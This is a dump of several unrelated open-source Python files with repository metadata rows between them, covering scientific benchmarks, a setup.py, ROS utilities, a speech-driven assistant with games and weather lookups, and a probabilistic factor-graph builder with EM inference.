filename = select_file(folder = folder, filter = '3ds (*.3ds)')
if len(filename)==0:
return None
for f in filename:
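# accumulate all grids into one; on the first file 'a' is not yet defined, so the NameError branch initializes it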
try:
a = a + grid_from_3ds(f)
except NameError:
a = grid_from_3ds(f)
return a
def fast_analysis(filename = None):
"""Do the default analysis on 3ds files
"""
grid=open3ds(filename)
if grid is None:
return None
grid.normal_fit()
grid.update_dict()
grid.fit()
contourplot(grid.extract_good())
return grid
def find_config():
"""Return the location of the config and
create folder to store it if needed
"""
if os.name == 'posix':
folder = os.path.expanduser('~/.pybeem')
elif os.name == 'nt':
folder = os.path.expandvars('%APPDATA%/pybeem')
else:
raise Exception("Don't know where to save config. OS unknown")
if not os.path.exists(folder):
os.makedirs(folder)
return folder + '/pybeem.conf'
def save_pref(filename = None):
if filename is None:
filename = find_config()
fid = open(filename,'w')
json.dump(_pref,fid)
fid.close()
def load_pref(filename = None):
global _pref
if filename is None:
filename = find_config()
if os.path.exists(filename):
fid = open(filename,'r')
_pref.update(json.load(fid))
fid.close()
|
gpl-3.0
| 6,990,025,243,627,736,000
| 23.356322
| 71
| 0.622935
| false
| 3.47377
| false
| false
| false
|
kapadia/geoblend
|
benchmark/benchmark_vector.py
|
1
|
2033
|
import os
import benchmark
import numpy as np
import rasterio as rio
from skimage.morphology import disk
from geoblend.vector import create_vector
class Benchmark_Vector_Small(benchmark.Benchmark):
def setUp(self):
directory = os.path.dirname(os.path.realpath(__file__))
fixtures = os.path.join(directory, '..', 'tests', 'fixtures')
srcpath = os.path.join(fixtures, 'source.tif')
refpath = os.path.join(fixtures, 'reference.tif')
with rio.open(srcpath) as src:
self.source = src.read(1).astype(np.float64)
with rio.open(refpath) as ref:
self.reference = ref.read(1).astype(np.float64)
# Create a non-rectangular mask
d = disk(60)
dim = 121 # disk dimension is 121x121
d2 = 0.5 * dim
height, width = self.source.shape
h2, w2 = 0.5 * height, 0.5 * width
y0, y1 = int(h2 - d2), int(h2 + d2)
x0, x1 = int(w2 - d2), int(w2 + d2)
self.mask = np.zeros_like(self.source, dtype=np.uint8)
self.mask[y0:y1, x0:x1] = d
def test_cython(self):
vector = create_vector(self.source, self.reference, self.mask)
class Benchmark_Vector_Large(benchmark.Benchmark):
def setUp(self):
directory = os.path.dirname(os.path.realpath(__file__))
fixtures = os.path.join(directory, '..', 'tests', 'fixtures')
srcpath = os.path.join(fixtures, '20150805_090528_0823_analytic', '20150805_090528_0823_analytic.tif')
refpath = os.path.join(fixtures, '20150805_090528_0823_analytic', 'resampled', 'reference.tif')
with rio.open(srcpath) as src:
self.source = src.read(1).astype(np.float64)
self.mask = src.read(4).astype(np.uint8)
with rio.open(refpath) as ref:
self.reference = ref.read(1).astype(np.float64)
def test_cython(self):
vector = create_vector(self.source, self.reference, self.mask)
if __name__ == '__main__':
benchmark.main(format='markdown', each=10)
|
mit
| -4,203,776,271,449,375,000
| 30.292308
| 110
| 0.618298
| false
| 3.216772
| false
| false
| false
|
stochasticHydroTools/RigidMultiblobsWall
|
single_sphere/single_sphere_rejection.py
|
1
|
1547
|
'''This script will display a histogram of a single sphere's height when next to a wall using sphere.py.
1,000,000 heights will be generated by iterating over n_steps, and written to a text file: rejection_locations.txt
On top of the histogram is a plot of the analytical GB distribution
Prints the time taken for all the calculations'''
import numpy as np
import time
import sphere as s
outFile = 'rejection_locations.txt'
# constants listed for convenience, none here are changed from what is in sphere.py
s.A = 0.265*np.sqrt(3./2.)
s.VISCOSITY = 8.9e-4
s.WEIGHT = 1.*0.0000000002*(9.8*1e6)
s.KT = 300.*1.3806488e-5
s.REPULSION_STRENGTH = 7.5 * s.KT
s.DEBYE_LENGTH = 0.5*s.A
sample_state = [0., 0., 1.1] # the position of a single sphere
n_steps = 1000000 # the number of height positions to be generated
f = open(outFile, 'w')
start_time = time.time()
# generate appropriate normalization constant
partition_steps = 10000 # number of samples generated for Z
partitionZ = s.generate_partition(partition_steps)
for i in range(n_steps):
# get a position from rejection function
sample_state = s.single_sphere_rejection(partitionZ)
# send that position to the data file
f.write(str(sample_state[2]) + '\n')
f.close()
end_time = time.time() - start_time
print(end_time) # should take somewhere around 80 seconds for one million heights
num_points = 100000
x, y = s.analytical_distribution(num_points) # calculate points for the analytical curve
s.plot_distribution(outFile, x, y, n_steps) # generate histogram and analytical curve
|
gpl-3.0
| 848,121,353,568,755,100
| 34.976744
| 114
| 0.74596
| false
| 3.209544
| false
| false
| false
|
abmantz/lmc
|
setup.py
|
1
|
3790
|
"""A setuptools based setup module.
See (and based on):
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='lmc',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.2.1',
description='Logarithmantic Monte Carlo',
long_description=long_description,
# The project's main homepage.
url='https://github.com/abmantz/lmc',
# Author details
author='Adam Mantz',
author_email='amantz@slac.stanford.edu',
# Choose your license
license='LGPL-3.0',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
# What does your project relate to?
#keywords='sample setuptools development',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['examples']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['numpy'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
#extras_require={
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
#package_data={
# 'sample': ['package_data.dat'],
#},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
#entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
#},
)
|
lgpl-3.0
| 3,584,288,068,886,303,000
| 34.092593
| 94
| 0.665963
| false
| 3.947917
| false
| false
| false
|
icoderaven/slytherin_dagger
|
src/utils.py
|
1
|
1217
|
#!/usr/bin/env python
import math
import numpy as np
#----------------------------------------------------------------------
#converts angles in degrees to radians
#----------------------------------------------------------------------
def deg_to_rad(angle):
return angle*math.pi/180.0
#----------------------------------------------------------------------
#converts angles in radians to degrees
#----------------------------------------------------------------------
def rad_to_deg(angle):
return angle*180.0/math.pi
#----------------------------------------------------------------------
#converts ROS Point/Vector3 object to a numpy array
#----------------------------------------------------------------------
def convert_position_to_array(position):
pos = np.zeros(3)
pos[0] = position.x
pos[1] = position.y
pos[2] = position.z
return pos
#----------------------------------------------------------------------
#converts ROS Quaternion object to a numpy array
#----------------------------------------------------------------------
def convert_orientation_to_array(orientation):
q = np.zeros(4)
q[0] = orientation.x
q[1] = orientation.y
q[2] = orientation.z
q[3] = orientation.w
return q
|
bsd-3-clause
| 7,963,987,814,229,428,000
| 32.805556
| 72
| 0.380444
| false
| 4.698842
| false
| false
| false
|
i-am-Q/my_py
|
mypa.py
|
1
|
12022
|
#mypa.py
import speech_recognition as sr #imports Speech_Recognition Modules
from AppKit import NSSpeechSynthesizer #imports Speech Synthesizer for tts
from random import randint #imports randint function
import time #imports time modules to pause actions
import sys #imports system functions
import json #imports json
import urllib
#import pyaudio #imports pyaudio to play audio
#import wave #imports .wav conversion
r = sr.Recognizer() #used to shorten recognizer
cont = True #used for while loops
playAgain = True
nssp = NSSpeechSynthesizer #used to shorten Apple's native speech synthesizer
ve = nssp.alloc().init() #used to shorten memory allocation and initialization of the speech synthesizer
voice = 'com.apple.speech.synthesis.voice.alex' #voice chosen for speech synthesizer
ve.setVoice_(voice) #sets appropriate voice
key = '19915fc68b895c6e' #api key for wunderground
def wakeUp(): #main function, will be used to "wake up" similar to "hey siri"
while cont: #ensures that the loop runs continuously
iSaid = listen() #listens for my input
if iSaid == 'hey bro': #'hey bro' is the wake up command. This statement checks to see if user wants to do something
talking('How can I help you sir',2) #talking function called
selection()
else: #if nothing is said that matches up prints warning and plays sound
print 'no go' #warning
print('\a')
def preSelection(userText, compare): #figures out which commands are being given based on a list of key words
try:
myCommand = [userText.find(word) != -1 for word in compare] #creates a true or false array based on what was said
comInterpreted = [i for i, x in enumerate(myCommand) if x] #extracts position of only true responses
return comInterpreted #sends back the response
except AttributeError:
print AttributeError #response when nothing is said
def selection():
while True:
iSaid = listen() #listen function called
broCommands = ['high','low','quit','current','weather','forecast','rock','paper','scissors','outside'] #key words to look out for
findTruth = preSelection(iSaid, broCommands)
print findTruth
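# findTruth lists the indices of the matched keywords, e.g. [0, 1] means both 'high' and 'low' were heard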
if (findTruth == [0,1]): #'game' command to start hi low game
playHiLow() #stars hi low game
elif (findTruth == [2]): #'quit command to terminate program
break #quits program
elif (findTruth == [3,4]) or (findTruth == [4,9]): #'weather' command to get current weather
currentWeather() #gets weather
elif (findTruth == [4,5]): #'forecast' command to get four day forecast
forecast() #gets forecast
elif (findTruth == [6,7,8]): #'rps' command to play rps
rpsGame() #plays rps game
def talking(text,talkTime): #(text) are the words that will be said. (talkTime) is the amount of time needed to complete sentence. This function will say the words and ensure that the program pauses so it does not hear itself
while ve.isSpeaking: #loop runs while the comp is talking
ve.startSpeakingString_(text) #says the text that is passed to the function
time.sleep(talkTime) #takes a pause while the computer speaks
break
def listen(): #listens to what is being said
with sr.Microphone() as source: #determines which mic to use
print '-'*50
print ''
print 'Adjusting for background noise' #preps to take background noise
r.adjust_for_ambient_noise(source) #listens for ambient noise
print("Set minimum energy threshold to {}".format(r.energy_threshold)) #displays ambient noise adjustment
print 'I am listening' #preps to listen to user
audio = r.listen(source) #listens to user
try:
myWords = r.recognize(audio) #turns captured audio into text
print('This time you said:' + myWords) #prints what you said
print ''
return myWords #returns the text so that it can continue to be used
except LookupError: #warns user that the audio could not be interpereted
talking('I am sorry, I could not understand what you said',3)
def playHiLow(): #Higher or Lower Game
playAgain = True #defines play again state
while playAgain: #loop to play game
numGuess = 0 #on a new game, number of guesses restarts
compNum = randint(1,10) #computer picks number
print compNum #DELETE LATER display computers number
talking('I have picked a number between one and ten. Can you guess what it is?',5) #let user know game has started
while True: #starts loop for current game
playerGuess = listen() #listens for players guess
if playerGuess == 'sex': #checks for the number 6 (has difficulty understanding difference between 6 and sex)
playerGuess = '6' #turns 'sex' into string '6'
try: #checks to see if it can make an integer
playerGuess = int(playerGuess) #turns number string into int
except ValueError: #if it cannot be turned into an integer, act like it did not understand
talking('I am sorry, I could not understand what you said',3) #proclaim ignorance
if playerGuess == compNum: #checks for a winning condition
numGuess += 1 #adds final count to number of guesses
text = 'Congratulations! You won in %i guesses!' %(numGuess) #congratulates the winner
talking(text,4) #says congratulations
talking('Do you want to play again. Yes or no?',2) #asks to play again
reDo = listen() #listens for user response
if reDo == 'yes': #checks if new game is to be played
break #breaks current loop to start a new game
else: #if anything else is said, assume a quit
playAgain = False #signal to end the entire game
break #break current loop
elif playerGuess < compNum: #check if players guess is below computers number
talking('Guess higher',1) #tell user to guess higher
numGuess += 1 #add to guess count
elif playerGuess > compNum: #check if players guess is above computers guess
talking('Guess lower',1) #tell user to guess lower
numGuess += 1
def getZIP():
url = 'http://ipinfo.io/json'
f = urllib.urlopen(url)
json_string = f.read()
parsed_json = json.loads(json_string)
zip = parsed_json['postal']
city = parsed_json['city']
state = parsed_json['region']
data = [zip,city,state]
return data
def currentWeather(): #current weather function
zip = getZIP() #listens for zip code
text = 'getting weather information on ' + zip[1] + ',' + zip[2]
talking(text, 4)
url = 'http://api.wunderground.com/api/' + key + '/geolookup/conditions/q/PA/' + zip[0] + '.json' #goes to wunderground api
f = urllib.urlopen(url) #gets data
json_string = f.read() #reads data
parsed_json = json.loads(json_string) #parses data
city = parsed_json['location']['city']
state = parsed_json['location']['state']
weather = parsed_json['current_observation']['weather']
temperature_string = parsed_json['current_observation']['temp_f']
temperature_string = str(temperature_string)
feelslike_string = parsed_json['current_observation']['feelslike_f']
weatherText = 'Weather in ' + city + ', ' + state + ': ' + weather.lower() + '. The temperature is ' + temperature_string + ' but it feels like ' + feelslike_string + '.'
talking(weatherText, 10)
f.close()
def forecast(): #four day forecast
zip = getZIP() #listens for zip code
text = 'getting weather information on ' + zip[1] + ',' + zip[2]
talking(text, 4)
url = 'http://api.wunderground.com/api/' + key + '/geolookup/forecast/q/' + zip[0] + '.json' #goes to wunderground api
f = urllib.urlopen(url) #gets data
json_string = f.read() #reads data
parsed_json = json.loads(json_string) #parses data
for day in parsed_json['forecast']['simpleforecast']['forecastday']: #loop to anounce forecast
x = day['date']['day'] #day is an integer
y = str(x) #convert integer to string
forecastText = 'The weather for ' + day['date']['weekday'] + ', ' + day['date']['monthname'] + ' ' + y + ' will be ' + day['conditions'] + ' with a high of ' + day['high']['fahrenheit'] + ' degrees fahrenheit and a low of ' + day['low']['fahrenheit'] + ' degrees farenheit'
talking(forecastText, 10)
f.close()
class rpsGame:
def __init__(self): #play RPS
compScore = 0
playerScore = 0
tieGame = 0
player = 0
playing = True
validity = True
talking('Lets play a game of Rock, Paper, Scissors', 3) #lets player know that the game is starting
while playing : #starts loop to play game
while validity: #starts loop for player selection
iSaid = listen() #listens for player response
broCommands = ['rock','paper','scissors','quit','Rock'] #key words to look out for
playerHand = preSelection(iSaid, broCommands)
if (playerHand == [0]) or (playerHand == [4]):
player = 1
break
elif playerHand == [1]:
player = 2
break
elif playerHand == [2]:
player = 3
break
elif playerHand == [3]:
player = 4
break
else:
print 'Invalid Choice'
if player ==4: #quits game
if playerScore > compScore:
text = 'final score, player %i, computer %i, Congratulations you win' % (playerScore, compScore)
elif playerScore < compScore:
text = 'final score, player %i, computer %i, Computer wins' % (playerScore, compScore)
else :
text = 'final score, player %i, computer %i, tie game' % (playerScore, compScore)
talking(text, 6)
break
else: #starts to determine a winner
comp = self.compHand() #gets a "hand" for computer
result = self.playHand(comp, player) #gets a result
playerChoice = self.interpret(player) #turns numbers into readable text
compChoice = self.interpret (comp)
print '\nYou played %s and the computer played %s' % (playerChoice, compChoice)
talking(result, 2)
print ''
print '-'*34
if result == 'Computer wins!':
compScore += 1
elif result == 'Player wins!':
playerScore += 1
elif result == 'Tie game':
tieGame += 1
print 'Player: %i Computer: %i Tie Games: %i' % (playerScore, compScore, tieGame)
print '-'*34
print ''
def compHand(self): #needed for rps game
compVal = randint(1,3)
return compVal
def interpret(self,num): #needed for rps game
if num == 1:
talking('Rock', 1)
return 'Rock'
elif num == 2:
talking('Paper', 1)
return 'Paper'
elif num == 3:
talking('Scissors', 1)
return 'Scissors'
def playHand(self,comp, player): #needed for rps game
if comp == player:
return 'Tie game'
if (comp == 1 and player == 3) or (comp == 2 and player == 1) or (comp == 3 and player == 2):
return 'Computer wins!'
else:
return 'Player wins!'
"""
if myWords == "run": #looks for 'run' command to run the hi low game
print 'got it'
import hi_lowGame
elif myWords == "game": #looks for 'game' command to run rps game
print 'starting game'
import rps_game
else: #lets user know that the command does not do anything
print 'not a command'
import random
"""
wakeUp()
|
gpl-2.0
| 7,865,665,472,232,642,000
| 45.242308
| 278
| 0.619198
| false
| 3.332964
| false
| false
| false
|
jessica-taylor/quipp2
|
src/python/graphbuilder.py
|
1
|
16660
|
import math
import numpy as np
from numpy import linalg
import itertools
from callhaskell import *
class Queue(object):
def __init__(self, items=None):
if items is None:
self.items = []
else:
self.items = list(reversed(items))
def dequeue(self):
return self.items.pop()
class VarId(object):
def __init__(self, state, id, expfam):
assert isinstance(id, int)
self.state = state
self.id = id
self.expfam = expfam
class FactorId(object):
def __init__(self, state, id):
assert isinstance(id, int)
self.state = state
self.id = id
class RandFunId(object):
def __init__(self, state, id):
assert isinstance(id, int)
self.state = state
self.id = id
class GraphState(object):
def __init__(self):
self.vars = {}
self.var_count = 0
self.rand_funs = []
self.factors = []
self.var_replacements = {}
def new_var(self, expfam):
varid = self.var_count
self.var_count += 1
self.vars[varid] = expfam
return VarId(self, varid, expfam)
def resolve_var(self, varid):
if varid.id in self.var_replacements:
return self.var_replacements[varid.id]
else:
return varid
def unify_vars(self, a, b):
self.var_replacements[b.id] = a
del self.vars[b.id]
return a
def unify_values(self, typ, a, b):
# TODO: this fails for e.g. Maybe
avars = typ.embedded_vars(a)
bvars = typ.embedded_vars(b)
assert len(avars) == len(bvars)
for av, bv in zip(avars, bvars):
self.unify_vars(av, bv)
return a
def new_factor(self, fac_info, args):
facid = len(self.factors)
self.factors.append((fac_info, map(self.resolve_var, args)))
return FactorId(self, facid)
def new_rand_fun(self, arg_exp_fams, res_exp_fam):
rfid = len(self.rand_funs)
self.rand_funs.append((arg_exp_fams, res_exp_fam))
return RandFunId(self, rfid)
def new_sample_from_rand_fun(self, rfid, arg_vars):
(arg_exp_fams, res_exp_fam) = self.rand_funs[rfid.id]
assert len(arg_exp_fams) == len(arg_vars)
v = self.new_var(res_exp_fam)
fac = self.new_factor({'type': 'randFun', 'id': rfid.id}, [v] + arg_vars)
return v
def new_const_factor(self, varid, value):
varid = self.resolve_var(varid)
ef = self.vars[varid.id]
return self.new_factor({'type': 'constant', 'expFam': ef, 'value': value}, [varid])
def new_const_var(self, ef, value):
varid = self.new_var(ef)
fac = self.new_const_factor(varid, value)
return varid
def rand_function(self, arg_types, res_type):
arg_tuple_type = Tuple(*arg_types)
rfids = [self.new_rand_fun(arg_tuple_type.exp_fams(), ef) for ef in res_type.exp_fams()]
def rf(*args):
assert len(args) == len(arg_types)
arg_vars = arg_tuple_type.embedded_vars(tuple(args))
res_vars = [self.new_sample_from_rand_fun(rfid, arg_vars) for rfid in rfids]
return res_type.vars_to_value(Queue(res_vars))
return rf
def to_JSON(self):
def replace_id(varid):
if varid.id in self.var_replacements:
return self.var_replacements[varid.id].id
else:
return varid.id
return {
'vars': [[varid, expfam] for (varid, expfam) in self.vars.items()],
'randFuns': [{'argExpFams': aefs, 'resExpFam': ref} for (aefs, ref) in self.rand_funs],
'factors': [{'factor': facinfo, 'argVarIds': [replace_id(a) for a in args]} for (facinfo, args) in self.factors]
}
"""
Type interface:
t.exp_fams()
Returns a list of exponential family names
t.embedded_vars(value)
Returns a list of var ids in value
t.vars_to_value(vars)
Given a queue of var ids, create a value
t.unfreeze(state, value)
Unfreezes a frozen value
"""
class DoubleValue(object):
def __init__(self, varid):
self.varid = varid
def get_type(self):
return Double
def freeze(self, varvals):
return varvals[self.varid.id]['value']
gaussian_exp_fam = {'type': 'gaussian'}
bernoulli_exp_fam = {'type': 'bernoulli'}
def categorical_exp_fam(n):
return {'type': 'categorical', 'n': n}
class DoubleClass(object):
def exp_fams(self):
return [gaussian_exp_fam]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return DoubleValue(vars.dequeue())
def unfreeze(self, state, value):
return DoubleValue(state.new_const_var(gaussian_exp_fam, value))
def __repr__(self):
return 'Double'
Double = DoubleClass()
class BoolValue(object):
def __init__(self, varid):
self.varid = varid
def get_type(self):
return Bool
def freeze(self, varvals):
return varvals[self.varid.id]['value']
class BoolClass(object):
def exp_fams(self):
return [bernoulli_exp_fam]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return BoolValue(vars.dequeue())
def unfreeze(self, state, value):
return BoolValue(state.new_const_var(bernoulli_exp_fam, value))
def __repr__(self):
return 'Bool'
Bool = BoolClass()
# class TupleValue(object):
#
# def __init__(self, fields):
# self.fields = tuple(fields)
class Tuple(object):
def __init__(self, *types):
self.types = types
def exp_fams(self):
ef = []
for t in self.types:
ef.extend(t.exp_fams())
return ef
def embedded_vars(self, value):
vs = []
for (t, v) in zip(self.types, value):
vs.extend(t.embedded_vars(v))
return vs
def vars_to_value(self, vars):
val = []
for t in self.types:
val.append(t.vars_to_value(vars))
return tuple(val)
def freeze(self, varvals, value):
return tuple([t.freeze(varvals, x) for (t, x) in zip(self.types, value)])
def unfreeze(self, state, value):
return tuple([t.unfreeze(state, v) for (t, v) in zip(self.types, value)])
def __repr__(self):
return repr(self.types)
class CategoricalValue(object):
def __init__(self, varid, n):
self.varid = varid
self.n = n
def get_type(self):
return Categorical(self.n)
def freeze(self, varvals):
return varvals[self.varid.id]['value']
class Categorical(object):
def __init__(self, n):
self.n = n
def exp_fams(self):
return [categorical_exp_fam(self.n)]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return CategoricalValue(vars.dequeue(), self.n)
def unfreeze(self, state, value):
return CategoricalValue(state.new_const_var(categorical_exp_fam(self.n), value), self.n)
def __repr__(self):
return 'Categorical(' + str(self.n) + ')'
def get_type(value):
if hasattr(value, 'get_type'):
return value.get_type()
elif isinstance(value, (tuple, list)):
return Tuple(*map(get_type, value))
else:
raise Exception('Unknown value type ' + str(type(value)) + ', value ' + str(value))
def freeze_value(value, varvals):
if hasattr(value, 'freeze'):
return value.freeze(varvals)
elif isinstance(value, (tuple, list)):
return tuple([freeze_value(v, varvals) for v in value])
else:
raise Exception('Unknown value type ' + str(type(value)) + ', value ' + str(value))
def Vector(n, typ):
print 'vector', n, typ, Tuple(*([typ]*n))
return Tuple(*([typ]*n))
Unit = Tuple()
current_graph_state = GraphState()
def rand_function(*ts):
return current_graph_state.rand_function(ts[:-1], ts[-1])
def uniform_categorical(n):
v = current_graph_state.new_var(categorical_exp_fam(n))
current_graph_state.new_factor({'type': 'uniformCategorical', 'n': n}, [v])
return CategoricalValue(v, n)
def normal(mean, stdev):
v = current_graph_state.new_var(gaussian_exp_fam)
current_graph_state.new_factor({'type': 'normal', 'mean': mean, 'stdev': stdev}, [v])
return DoubleValue(v)
def conditioned_network(state, typ, sampler, frozen_samps):
samples = [sampler() for i in range(len(frozen_samps))]
for (latent, s), fs in zip(samples, frozen_samps):
unfrozen = typ.unfreeze(state, fs)
state.unify_values(get_type(s), s, unfrozen)
return [latent for (latent, _) in samples]
def condition_on_frozen_samples(graph_state, samples, frozen_samples):
for s,f in zip(samples, frozen_samples):
typ = get_type(s[1])
graph_state.unify_values(typ, s[1], typ.unfreeze(graph_state, f))
return graph_state.to_JSON()
def infer_states_and_parameters(templ):
(state, params) = hs_init_em(templ)
state = hs_infer_state(templ, state, params)
score = hs_score(templ, state, params)
yield (state, params, score)
i = 0
while True:
print 'iter', i
params = hs_infer_params(templ, state, params)
state = hs_infer_state(templ, state, params)
score = hs_score(templ, state, params)
yield (state, params, score)
i += 1
def translate_params_for_fn(params):
if len(params[1][0]) == 0:
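# no linear coefficients means a categorical output: treat params[0] as log-odds relative to category 0 and softmax-normalize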
probs = [math.exp(x) for x in [0.0] + params[0]]
sum_probs = sum(probs)
return [p/sum_probs for p in probs]
else:
variance = -1.0 / (2 * params[0][1])
factors = [params[0][0]] + params[1][0]
return (variance, [f*variance for f in factors])
def params_to_cluster_centers(params):
d = dict(params)
cluster_centers = []
for i in d:
ps = d[i]
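# Gaussian natural parameters: eta1 = mean/variance, eta2 = -1/(2*variance), hence variance = -1/(2*eta2)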
variance = -1.0 / (2 * ps[0][1])
factors = [ps[0][0]] + ps[1][0]
scaled_factors = [f*variance for f in factors]
centers = [scaled_factors[0]] + [x + scaled_factors[0] for x in scaled_factors[1:]]
cluster_centers.append(centers)
return zip(*cluster_centers)
def cluster_centers_error(cs1, cs2):
errs = []
def tup_dist(t1, t2):
return sum((a-b)**2 for (a, b) in zip(t1, t2))
for cs in itertools.permutations(cs1):
errs.append(sum(map(tup_dist, cs, cs2)))
return min(errs)
def cluster_assignment_accuracy(cs1, cs2):
accuracies = []
for perm in itertools.permutations(range(3)):
accuracies.append(float(len([() for (a, b) in zip(cs1, cs2) if a == perm[b]])) / len(cs1))
return max(accuracies)
def translate_params(params):
return [(x, translate_params_for_fn(y)) for (x, y) in params]
def mean(xs):
return sum(xs) / len(xs)
def run_clustering_example(run):
global current_graph_state
n = 100
accs = []
for i in range(100):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
print hs_sample_bayes_net(templ, rand_params)
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
for (state, params, score) in state_params_list:
print 'score', score
cs = params_to_cluster_centers(params)
# if j > 1:
# varvals = state_to_varvals(state)
# state_latents = [freeze_value(samp[0], varvals) for samp in samples]
# acc = cluster_assignment_accuracy(true_latents, state_latents)
# iter_accs.append(acc)
j += 1
accs.append(iter_accs)
print map(mean, zip(*accs))
def params_to_matrix(params):
coords = []
component_variances = []
for (i, ((base_n1, n2), (lin,))) in params:
component_variances.append(-1.0 / (2 * n2))
coords.append([-l/(2 * n2) for l in [base_n1] + lin])
return component_variances, np.matrix(coords)
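# Under the factor-analysis model x = mu + A z + eps (z standard normal, eps
# independent noise), the marginal over x is Gaussian with mean mu and
# covariance A A^T + diag(noise variances); matrix_to_gaussian builds exactly
# that pair from the (variances, [mu | A]) output above.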
def matrix_to_gaussian(variances_mat):
variances, mat = variances_mat
mean = mat[:,0]
a = mat[:, 1:]
return (mean, a * a.T + np.diag(variances))
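# Closed-form KL divergence between two n-dimensional Gaussians p = N(pm, pv)
# and q = N(qm, qv):
#   KL(p || q) = 0.5 * ( tr(qv^-1 pv) + (qm - pm)^T qv^-1 (qm - pm)
#                        - n + log det(qv) - log det(pv) )
# which is what the expression below computes via slogdet.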
def gaussian_kl(p, q):
(pm, pv) = p
(qm, qv) = q
n = pm.shape[0]
assert pv.shape[0] == n == qv.shape[0]
return 0.5 * (np.trace(linalg.inv(qv) * pv) + ((qm - pm).T * linalg.inv(qv) * (qm - pm)).item((0,0)) - n + linalg.slogdet(qv)[1] - linalg.slogdet(pv)[1])
def rotation_invariant_dist(A, B):
# min_R ||AR - B||^2
# = min_R tr((AR - B)^T(AR - B))
# = min_R tr(R^TA^T A R - B^T A R - R^T A^T B + B^T B)
# = ||A||^2 + ||B||^2 - 2 max_R tr(R^T A^T B)
#
# A^T B = USV^T
#
# = ||A||^2 + ||B||^2 - 2 max_R tr(R^T USV^T)
# = ||A||^2 + ||B||^2 - 2 max_R tr(V^T R^T US)
# = ||A||^2 + ||B||^2 - 2 max_R tr(S)
# -> R = UV^T
u, s, v = linalg.svd(A.T * B)
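    # svd returns V^T as its third value here, so with matrix objects
    # u * v is the orthogonal Procrustes rotation R = U V^T.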
r = u * v
# print linalg.norm(A*r - B)**2
return (r, linalg.norm(A)**2 + linalg.norm(B)**2 - 2 * sum(s))
# IDEA: compute Gaussian from factors, KL divergence!
def params_score(templ, params):
(state, _) = hs_init_em(templ)
state = hs_infer_state(templ, state, params, iters=10)
return hs_score(templ, state, params)
def run_factor_analysis_example(run):
global current_graph_state
n = 200
accs = []
for i in range(1):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
rand_mat = params_to_matrix(rand_params)
print rand_mat
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
# print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
# rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
for (state, params, score) in state_params_list:
print 'score', score
guess_mat = params_to_matrix(params)
# cs = params_to_cluster_centers(params)
if j > 1:
print guess_mat
print 'kl', gaussian_kl(matrix_to_gaussian(rand_mat), matrix_to_gaussian(guess_mat))
print 'rid', rotation_invariant_dist(rand_mat[1], guess_mat[1])
j += 1
# accs.append(iter_accs)
# print map(mean, zip(*accs))
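# get_transition_matrix turns logit-style parameters into a stochastic matrix:
# column 0 gets an implicit 0 logit, row 0 uses the base logits alone, row i > 0
# adds each remaining column's offset for state i to that column's base logit,
# and every row is normalised with a softmax so it sums to 1.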
def get_transition_matrix(params):
base, mat = params
rows = []
for i in range(1 + len(mat[0])):
if i == 0:
logodds = [0.0] + base
else:
logodds = [0.0] + [b + m[i-1] for (b,m) in zip(base, mat)]
probs = list(map(math.exp, logodds))
sum_probs = sum(probs)
rows.append([p / sum_probs for p in probs])
return rows
def hmm_parameters(params):
return (get_transition_matrix(params[0][1]), get_transition_matrix(params[1][1]))
def matrix_dist(m1, m2):
return linalg.norm(np.matrix(m1) - np.matrix(m2))**2
def permute_rows(perm, mat):
return [mat[i] for i in perm]
